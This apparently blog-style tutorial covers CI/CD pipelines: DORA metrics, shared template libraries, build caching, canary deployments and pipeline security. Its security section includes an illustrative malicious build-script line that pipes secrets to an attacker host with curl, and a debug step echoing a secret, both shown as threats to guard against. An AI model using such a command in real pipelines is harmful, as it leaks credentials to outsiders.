Tools: Your CI/CD Pipeline is a Dumpster Fire: Here's the Extinguisher 🧯
Welcome to Pipeline Therapy
DORA Metrics: How to Know If You're Actually Good
Here's the Uncomfortable Truth
How to Track DORA Now
Pipeline Architecture: The Template Library Pattern
The Anti-Pattern: Every Team Reinvents the Wheel
The Solution: Shared Template Library
Azure DevOps: Template Library in Action
GitHub Actions: Reusable Workflows
Pipeline Performance: From 45 Minutes to 5
Where's the Time Going?
The Optimization Playbook
Real-World Disaster #1: The Self-Hosted Runner That Poisoned Everything
Deployment Strategies: How to Ship Without Sinking
The Deployment Strategy Menu
Canary Deployment: The Smart Way to Ship
Real-World Disaster #2: The Friday 5 PM Deployment
Pipeline Security: Your Pipeline is an Attack Vector
Things That Should Scare You
Pipeline Security Checklist
Real-World Disaster #3: The Secret That Wasn't Secret
Multi-Team Governance: Herding Cats With Guardrails
Key Takeaways
Homework

Let me describe your CI/CD pipeline. Stop me when I'm wrong:

Let's fix all of this.

Before fixing anything, you need to measure where you stand. Google's DORA research (14,000+ teams studied) identified 4 key metrics that predict software delivery performance:

If your team deploys once a week, your lead time is 3 days, and your change failure rate is 30%, you are statistically average. Not bad, but not good either.

Elite teams deploy multiple times per day with a change failure rate of 15% or less. They're not smarter; they have better pipelines, smaller changes, and more automation.

Or use tools like Sleuth, LinearB, or GitHub's built-in DORA metrics (available in GitHub Insights for Enterprise).

In my experience auditing pipelines, here's where time hides:

1. Cache Dependencies
2. Docker Layer Caching
3. Run Tests in Parallel
4. Only Test What Changed

What Happened: Self-hosted build agents accumulated Docker images, node_modules caches, and build artifacts over months. The disk filled up, and builds started failing randomly across all teams.

Worse: One build left behind a corrupted node_modules folder. The next build on the same agent reused the corrupted cache and deployed a broken application.

What Happened: The team deploys at 5:07 PM on Friday (bad idea, but deadlines). A rolling update replaces all 3 pods. The new version has a memory leak that manifests after 4 hours. At 9 PM, pods start getting OOMKilled. Nobody's monitoring. By Saturday morning, the payment service has been down for 12 hours.

If they had used canary: The 5% canary pod would have shown increasing memory usage within 2 hours. Automated rollback triggers at 7 PM. 95% of users never notice. The team enjoys their weekend.

Your CI/CD pipeline has more access than most developers:

What Happened: A developer added a debug step to a pipeline:

GitHub/Azure DevOps masks secrets in logs... usually. But this string was only partially masked because it contained special characters that broke the masking regex. The full production database password appeared in the build log. The build log was accessible to 200 developers.

At the Principal level, you're not just building pipelines; you're building the pipeline platform that 10+ teams use. Here's how to standardize without becoming a bottleneck:

Next up in the series: Your App is on Fire and You Don't Even Know: Observability for Humans, where we decode metrics, logs, traces, and why alert fatigue is slowly killing your team.

What's the longest CI/CD pipeline you've ever suffered through? I once saw a 3-hour Java build. Yes, three hours. Share your pain below.
Metric                 │ Elite          │ "We Need Help"
───────────────────────┼────────────────┼─────────────────
Deployment Frequency   │ Multiple/day   │ Monthly or less
Lead Time for Changes  │ < 1 hour       │ > 1 month
Change Failure Rate    │ 0-15%          │ > 45%
Mean Time to Recovery  │ < 1 hour       │ > 6 months
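To make the table actionable, here is a minimal Python sketch that labels a team's numbers against its two columns. The `DoraSnapshot` class, the `classify` function, and the 30-day month are illustrative assumptions, not part of the DORA research or of any tool; anything that falls between the two columns is simply reported as "in between".

```python
from dataclasses import dataclass


@dataclass
class DoraSnapshot:
    """Hypothetical container for one team's four DORA numbers."""
    deploys_per_day: float       # deployment frequency
    lead_time_hours: float       # commit-to-production lead time
    change_failure_rate: float   # fraction of deploys that fail, 0.0 to 1.0
    recovery_hours: float        # mean time to recovery


MONTH_HOURS = 30 * 24  # assumption: a month is treated as 30 days


def _band(is_elite: bool, needs_help: bool) -> str:
    if is_elite:
        return "elite"
    return "needs help" if needs_help else "in between"


def classify(s: DoraSnapshot) -> dict[str, str]:
    """Label each metric using the thresholds from the table above."""
    return {
        "deployment_frequency": _band(s.deploys_per_day > 1,
                                      s.deploys_per_day <= 1 / 30),
        "lead_time": _band(s.lead_time_hours < 1,
                           s.lead_time_hours > MONTH_HOURS),
        "change_failure_rate": _band(s.change_failure_rate <= 0.15,
                                     s.change_failure_rate > 0.45),
        "recovery_time": _band(s.recovery_hours < 1,
                               s.recovery_hours > 6 * MONTH_HOURS),
    }
```

A team that deploys weekly with a 3-day lead time and a 30% failure rate (plus an assumed 24-hour recovery time) comes out "in between" on every metric, which matches the "statistically average" description.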
# GitHub Actions: Track deployment frequency
- name: Record deployment
  run: |
    curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \
      -H "Content-Type: application/json" \
      -d '{
        "event": "deployment",
        "service": "${{ github.repository }}",
        "environment": "production",
        "sha": "${{ github.sha }}",
        "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'"
      }'
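Once events like the one above are being stored somewhere, deployment frequency is just a count per day. The sketch below assumes the events are available as a list of dictionaries with the same field names as the JSON payload; the `deployments_per_day` function is a hypothetical helper, not part of any metrics product.

```python
from collections import Counter
from datetime import datetime, timezone


def deployments_per_day(events: list[dict]) -> dict[str, int]:
    """Count production deployment events per UTC calendar day."""
    counts = Counter()
    for event in events:
        # Ignore anything that is not a production deployment.
        if event.get("event") != "deployment":
            continue
        if event.get("environment") != "production":
            continue
        # Timestamps use the format produced by `date -u +%Y-%m-%dT%H:%M:%SZ`.
        ts = datetime.strptime(event["timestamp"], "%Y-%m-%dT%H:%M:%SZ")
        ts = ts.replace(tzinfo=timezone.utc)
        counts[ts.date().isoformat()] += 1
    return dict(counts)
```

Averaging these daily counts over a few weeks gives a number you can compare against the "Multiple/day" and "Monthly or less" columns.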
Team Alpha:   800-line custom YAML → Azure DevOps
Team Bravo:   600-line custom YAML → Azure DevOps (different structure)
Team Charlie: "We just deploy from our laptops"

Result:
• 3 different security scanning approaches
• 2 teams forgot to add container image scanning
• 1 team has no tests in their pipeline
• Nobody can help debug another team's pipeline
┌────────────────────────────────────────────────┐
│        Shared Template Library (v2.5.0)        │
│                                                │
│  ┌─────────┐  ┌─────────┐  ┌─────────────┐     │
│  │ Build   │  │ Test    │  │ Security    │     │
│  │ Template│  │ Template│  │ Scan        │     │
│  │ (.NET,  │  │ (unit,  │  │ Template    │     │
│  │  Node,  │  │  integ, │  │ (Trivy,     │     │
│  │  Python)│  │  e2e)   │  │  Checkov)   │     │
│  └─────────┘  └─────────┘  └─────────────┘     │
│  ┌─────────┐  ┌─────────┐  ┌─────────────┐     │
│  │ Deploy  │  │ Notify  │  │ Rollback    │     │
│  │ Template│  │ Template│  │ Template    │     │
│  │ (K8s,   │  │ (Slack, │  │ (auto/      │     │
│  │  AppSvc)│  │  Teams) │  │  manual)    │     │
│  └─────────┘  └─────────┘  └─────────────┘     │
└────────────────────────────────────────────────┘
                        │ consumed by
                        ▼
┌────────────────────────────────────────────────┐
│  Team pipelines (10-20 lines each!)            │
│  "Use build template, test template, deploy    │
│   template: just tell it your service name"    │
└────────────────────────────────────────────────┘
# Team's pipeline: SHORT and STANDARD
trigger:
  branches:
    include: [main]

resources:
  repositories:
    - repository: templates
      type: git
      name: platform/pipeline-templates
      ref: refs/tags/v2.5.0  # Always pin the version!

stages:
  - template: stages/ci.yml@templates
    parameters:
      language: dotnet
      dotnetVersion: '8.0'
      testProjects: '**/*Tests.csproj'

  - template: stages/security-scan.yml@templates
    parameters:
      trivySeverity: 'CRITICAL,HIGH'

  - template: stages/deploy-k8s.yml@templates
    parameters:
      environment: staging
      aksCluster: aks-staging-eastus
      namespace: payments

  - template: stages/deploy-k8s.yml@templates
    parameters:
      environment: production
      aksCluster: aks-prod-eastus
      namespace: payments
      requireApproval: true
# .github/workflows/deploy.yml: Team's workflow
name: Deploy
on:
  push:
    branches: [main]

jobs:
  build-and-test:
    uses: myorg/shared-workflows/.github/workflows/build-dotnet[email protected]
    with:
      dotnet-version: '8.0'
      project-path: 'src/PaymentService'

  security-scan:
    needs: build-and-test
    uses: myorg/shared-workflows/.github/workflows/security-scan[email protected]
    with:
      image: ${{ needs.build-and-test.outputs.image }}

  deploy:
    needs: [build-and-test, security-scan]
    uses: myorg/shared-workflows/.github/workflows/deploy-k8s[email protected]
    with:
      environment: production
      image: ${{ needs.build-and-test.outputs.image }}
    secrets: inherit
Typical 45-minute pipeline breakdown:
─────────────────────────────────────────
  7 min  ████████        Agent startup + checkout
 12 min  ██████████████  Dependency install (npm/nuget)
  5 min  ███████         Build
  8 min  ██████████      Tests (running ALL tests sequentially)
  3 min  █████           Docker build (no layer caching)
  5 min  ███████         Security scanning
  5 min  ███████         Deploy + smoke tests
─────────────────────────────────────────
 45 min total

Optimized 5-minute pipeline:
─────────────────────────────────────────
0.5 min  ███             Cached checkout
0.5 min  ███             Cached dependencies
  1 min  ████            Incremental build
  1 min  ████            Parallel tests (affected only)
0.5 min  ███             Docker build (cached layers)
  1 min  ████            Parallel: scan + deploy
0.5 min  ███             Smoke test
─────────────────────────────────────────
  5 min total
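If you record step durations for your own pipeline, ranking them is a few lines of Python. This is only a sketch: the `biggest_bottlenecks` function is a hypothetical helper, and the sample numbers are the ones from the 45-minute breakdown above, not measurements from a real system.

```python
def biggest_bottlenecks(step_minutes: dict[str, float],
                        top: int = 3) -> list[tuple[str, float, float]]:
    """Return the slowest steps as (name, minutes, percent of total)."""
    total = sum(step_minutes.values())
    ranked = sorted(step_minutes.items(), key=lambda item: item[1], reverse=True)
    return [(name, minutes, round(100 * minutes / total, 1))
            for name, minutes in ranked[:top]]


# Durations copied from the 45-minute breakdown above.
SLOW_PIPELINE = {
    "Agent startup + checkout": 7,
    "Dependency install": 12,
    "Build": 5,
    "Tests": 8,
    "Docker build": 3,
    "Security scanning": 5,
    "Deploy + smoke tests": 5,
}

if __name__ == "__main__":
    for name, minutes, share in biggest_bottlenecks(SLOW_PIPELINE):
        print(f"{name}: {minutes} min ({share}% of total)")
```

In this example dependency installation alone accounts for more than a quarter of the run, which is why caching is the first item in the playbook.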
# GitHub Actions: Cache the npm download cache (~/.npm)
- uses: actions/cache@v4
  with:
    path: ~/.npm
    key: npm-${{ hashFiles('**/package-lock.json') }}
    restore-keys: npm-

# Azure DevOps: Cache NuGet packages
- task: Cache@2
  inputs:
    key: 'nuget | "$(Agent.OS)" | **/packages.lock.json'
    restoreKeys: 'nuget | "$(Agent.OS)"'
    path: $(NUGET_PACKAGES)
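The idea behind both cache keys is the same: derive the key from the contents of the lock file, so the cache is reused until dependencies actually change. The Python sketch below illustrates that idea only; `cache_key` is a hypothetical function and does not reproduce how `hashFiles` or the `Cache@2` task compute their hashes.

```python
import hashlib
from pathlib import Path


def cache_key(prefix: str, lock_files: list[Path]) -> str:
    """Build a cache key that changes only when a lock file's content changes."""
    digest = hashlib.sha256()
    # Sort so the key does not depend on the order files were discovered in.
    for path in sorted(lock_files):
        digest.update(path.read_bytes())
    return f"{prefix}-{digest.hexdigest()}"
```

Because source code is not part of the hash, a commit that only touches application code maps to the same key and gets a cache hit.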
# BAD: Copying everything first breaks the cache
COPY . .
RUN npm install

# GOOD: Copy package files first, install, THEN copy code
COPY package.json package-lock.json ./
RUN npm ci --production
COPY . .
# Now code changes don't re-trigger npm install
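# GitHub Actions: Matrix strategy
# Requires a test runner that supports --shard (for example Jest 28+)
jobs:
  test:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        shard: [1, 2, 3, 4]
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test -- --shard=${{ matrix.shard }}/4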
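Sharding works because every runner can decide on its own which tests belong to it, with no coordination. Here is a rough Python sketch of one way to do that, using a stable hash of the test ID; `in_shard` and `select_shard` are hypothetical helpers, and real test runners use their own partitioning logic.

```python
import zlib


def in_shard(test_id: str, shard: int, total: int) -> bool:
    """Return True if test_id belongs to the 1-based shard out of total shards."""
    # crc32 is stable across processes and machines, unlike Python's hash().
    return zlib.crc32(test_id.encode("utf-8")) % total == shard - 1


def select_shard(test_ids: list[str], shard: int, total: int) -> list[str]:
    """Pick the subset of tests that one matrix job should run."""
    if not 1 <= shard <= total:
        raise ValueError("shard must be between 1 and total")
    return [t for t in test_ids if in_shard(t, shard, total)]
```

Each test lands in exactly one shard, so four jobs together run the full suite once. Hash-based splitting does not balance by duration, so uneven shards are possible.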
# For monorepos: detect which service changed
- uses: dorny/paths-filter@v3
  id: changes
  with:
    filters: |
      payments:
        - 'services/payments/**'
      users:
        - 'services/users/**'

- name: Test payments
  if: steps.changes.outputs.payments == 'true'
  run: cd services/payments && npm test
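Conceptually, the filter step maps a list of changed files to the services that own them. The Python sketch below shows that mapping with the same two patterns; `affected_services` is a hypothetical helper, and `fnmatchcase` only approximates the glob semantics of the real action.

```python
from fnmatch import fnmatchcase

# Same patterns as the filter configuration above.
FILTERS = {
    "payments": ["services/payments/**"],
    "users": ["services/users/**"],
}


def affected_services(changed_files: list[str],
                      filters: dict[str, list[str]]) -> list[str]:
    """Return the services with at least one changed file matching their patterns."""
    return sorted(
        name
        for name, patterns in filters.items()
        if any(fnmatchcase(path, pattern)
               for path in changed_files
               for pattern in patterns)
    )
```

A change to a shared file such as the root README matches no filter, so no service tests run; whether that is safe depends on what your shared files can break.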
ERROR: npm ERR! ENOSPC: no space left on device
# GitHub Actions syntax; in Azure DevOps use `condition: always()` on a script step
- name: Agent cleanup
  if: always()
  run: |
    docker system prune -af --volumes
    rm -rf /tmp/build-*
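Cleanup after the build helps, but a cheap pre-flight check can also stop a build before it runs out of disk halfway through. A minimal sketch, assuming a 10 GB threshold that you would tune for your own agents; `has_enough_disk` is a hypothetical helper.

```python
import shutil


def has_enough_disk(path: str = ".", min_free_gb: float = 10.0) -> bool:
    """Return True if the filesystem holding path has at least min_free_gb free."""
    usage = shutil.disk_usage(path)
    free_gb = usage.free / 1024 ** 3
    return free_gb >= min_free_gb


if __name__ == "__main__":
    # Exit non-zero so the pipeline step fails fast with a clear message.
    if not has_enough_disk():
        raise SystemExit("Agent is low on disk space; clean up before building")
```

Run as the first step of a job, this turns a random ENOSPC failure deep in the build into an immediate, readable one.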
Strategy         │ Risk   │ Speed │ Rollback │ Best For
─────────────────┼────────┼───────┼──────────┼────────────────────────
Rolling Update   │ Med    │ Fast  │ Slow     │ Default K8s strategy
Blue-Green       │ Low    │ Fast  │ Instant  │ Stateless services
Canary           │ Low    │ Slow  │ Fast     │ High-risk changes
Feature Flags    │ Lowest │ Inst. │ Instant  │ Business logic changes
Step 1: Deploy new version to 5% of traffic
┌─────────────────────────────────┐
│  95% traffic → v1.0 (3 pods)    │
│   5% traffic → v2.0 (1 pod)     │ ← Watch error rates, latency
└─────────────────────────────────┘

Step 2: If metrics look good, increase to 25%
┌─────────────────────────────────┐
│  75% traffic → v1.0 (3 pods)    │
│  25% traffic → v2.0 (1 pod)     │ ← Still watching...
└─────────────────────────────────┘

Step 3: If still good, go to 100%
┌─────────────────────────────────┐
│ 100% traffic → v2.0 (3 pods)    │ ← Full rollout
└─────────────────────────────────┘

Step ABORT: If any stage looks bad
┌─────────────────────────────────┐
│ 100% traffic → v1.0 (3 pods)    │ ← Safely rolled back
│   0% traffic → v2.0 (removed)   │
└─────────────────────────────────┘
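The promote-or-abort decision at each step can be sketched as a small function. The stage percentages come from the diagram above; the `Metrics` class, the `next_traffic_percent` function, and both thresholds are illustrative assumptions, and a real rollout tool would also look at how long the canary has been observed.

```python
from dataclasses import dataclass

STAGES = [5, 25, 100]  # traffic percentages from the diagram above


@dataclass
class Metrics:
    error_rate: float       # fraction of failed requests, 0.0 to 1.0
    p95_latency_ms: float


def next_traffic_percent(current: int, baseline: Metrics, canary: Metrics,
                         max_error_increase: float = 0.01,
                         max_latency_ratio: float = 1.2) -> int:
    """Return the next canary traffic share, or 0 to abort and roll back."""
    too_many_errors = canary.error_rate > baseline.error_rate + max_error_increase
    too_slow = canary.p95_latency_ms > baseline.p95_latency_ms * max_latency_ratio
    if too_many_errors or too_slow:
        return 0  # Step ABORT: all traffic goes back to the old version
    later_stages = [p for p in STAGES if p > current]
    return later_stages[0] if later_stages else 100
```

For a slow failure like a memory leak, you would add memory growth to the compared metrics; error rate and latency alone may look healthy for hours.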
Scary Thing #1: Secrets in pipeline logs
┌──────────────────────────────────────────────┐
│ Step: Deploy                                 │
│ $ echo $DATABASE_CONNECTION_STRING           │
│ Server=prod.db.windows.net;Password=Pa$$w0rd │
└──────────────────────────────────────────────┘

Scary Thing #2: Pull request pipelines run arbitrary code
┌──────────────────────────────────────────────┐
│ External contributor opens PR                │
│ PR changes build script to:                  │
│   echo $SECRETS | curl attacker.com          │
│ Pipeline runs automatically...               │
└──────────────────────────────────────────────┘

Scary Thing #3: Dependency confusion attacks
┌──────────────────────────────────────────────┐
│ Internal package: @mycompany/utils           │
│ Attacker publishes: @mycompany/utils on npm  │
│ Pipeline installs public one first...        │
└──────────────────────────────────────────────┘
Authentication:
✅ OIDC federation (no long-lived secrets in pipelines)
✅ Managed Identity for Azure resources
✅ Short-lived tokens (expire in minutes, not months)

Authorization:
✅ Pipeline can only deploy to its own service
✅ Production deploys require approved PR + passing checks
✅ Environment protection rules with required reviewers

Dependencies:
✅ Lock files committed (package-lock.json, go.sum)
✅ Dependency scanning (Dependabot, Snyk)
✅ Private package registry for internal packages

Secrets:
✅ Never echo/print secrets in logs
✅ Use secret masking in pipeline variables
✅ Rotate secrets automatically
✅ Audit who accesses what secret
- name: Debug connection
  run: |
    echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}"
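To see how special characters can defeat log masking, consider a masker that uses the secret itself as a regular expression. This Python sketch shows one plausible failure mode only; it is an assumption for illustration and not how GitHub or Azure DevOps actually implement masking. The sample password is the one from the "Scary Thing #1" example.

```python
import re


def mask_naive(log_line: str, secret: str) -> str:
    """Buggy: treats the secret as a regex, so characters like $ change its meaning."""
    return re.sub(secret, "***", log_line)


def mask_escaped(log_line: str, secret: str) -> str:
    """Safer: escape the secret so it is matched as literal text."""
    return re.sub(re.escape(secret), "***", log_line)


if __name__ == "__main__":
    line = "Server=prod.db.windows.net;Password=Pa$$w0rd"
    print(mask_naive(line, "Pa$$w0rd"))    # the password is still visible
    print(mask_escaped(line, "Pa$$w0rd"))  # the password is replaced
```

In the naive version `$` is read as an end-of-string anchor, so the pattern never matches and the line is logged unchanged. Even correct masking is a last line of defense; not printing the secret at all is the real fix.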
# GitHub Actions: OIDC to Azure (no secrets!)
permissions:
  id-token: write
  contents: read

steps:
  - uses: azure/login@v2
    with:
      client-id: ${{ vars.AZURE_CLIENT_ID }}  # Not a secret!
      tenant-id: ${{ vars.AZURE_TENANT_ID }}
      subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}
Platform Team Provides:          App Teams Customize:
──────────────────────           ────────────────────
✅ Template library              ✅ Service name & config
✅ Security scanning             ✅ Test commands
✅ Deployment strategies         ✅ Environment-specific vars
✅ Secret management pattern     ✅ Notification channels
✅ DORA metrics collection       ✅ Deployment schedule
✅ Compliance guardrails         ✅ Custom test stages
Template repo: platform/pipeline-templates
├── Maintained by platform team
├── Versioned with semantic versioning (v2.5.0)
├── Teams consume via git tags (treated as immutable references)
├── Breaking changes = major version bump
├── Teams can contribute improvements via PR
└── Monthly "template office hours" for questions
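The "breaking changes = major version bump" rule is easy to check mechanically, for example before auto-upgrading a team's pinned template tag. A minimal sketch, assuming tags always look like `v2.5.0`; `parse_tag` and `upgrade_kind` are hypothetical helpers, not part of any existing tool.

```python
def parse_tag(tag: str) -> tuple[int, int, int]:
    """Turn a tag such as 'v2.5.0' into (2, 5, 0)."""
    major, minor, patch = tag.lstrip("v").split(".")
    return int(major), int(minor), int(patch)


def upgrade_kind(current: str, candidate: str) -> str:
    """Classify moving from current to candidate: none, patch, minor, or major."""
    cur, new = parse_tag(current), parse_tag(candidate)
    if new <= cur:
        return "none"   # same version or a downgrade: nothing to do
    if new[0] > cur[0]:
        return "major"  # may contain breaking changes, needs a human
    if new[1] > cur[1]:
        return "minor"
    return "patch"
```

One possible policy is to let a bot open upgrade PRs automatically for "patch" and "minor" results and to route "major" upgrades through template office hours.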
- It takes 42 minutes to build and deploy
- Nobody knows exactly what it does (the YAML is 800 lines)
- Each team has their own custom pipeline because "our needs are different"
- Flaky tests fail 20% of the time, and everyone just re-runs the pipeline
- There's a manual approval step where someone clicks "Approve" without looking
- Someone set it up 3 years ago and that person doesn't work here anymore

- Use ephemeral agents (fresh VM/container per build): Azure DevOps Scale Set agents or GitHub Actions hosted runners
- If self-hosted, add a cleanup job:

- Never deploy on Friday (unless you have canary + automated rollback)
- Never deploy during peak hours (find your low-traffic window)
- Always have automated rollback based on error rates and latency
- Small changes, frequent deploys > big changes, occasional deploys

- It can push code to production
- It has access to secrets and credentials
- It can modify infrastructure
- It downloads code from the internet (dependencies)

- Remove all echo/print statements that reference secrets
- Use OIDC federation so there are no secrets to leak:

- Measure DORA metrics: you can't improve what you don't measure
- Template libraries standardize quality without removing team autonomy
- Cache everything to cut build times by 80%+
- Canary deployments are among the safest ways to ship to production
- OIDC federation eliminates the #1 pipeline security risk (leaked secrets)
- Never deploy on Friday. Just don't.

- Time your pipeline end-to-end. Write down the duration of each step. Find the biggest bottleneck.
- Check if your pipeline uses long-lived secrets. Replace one with OIDC federation.
- Add caching for dependencies if you haven't already, then measure the before/after build time.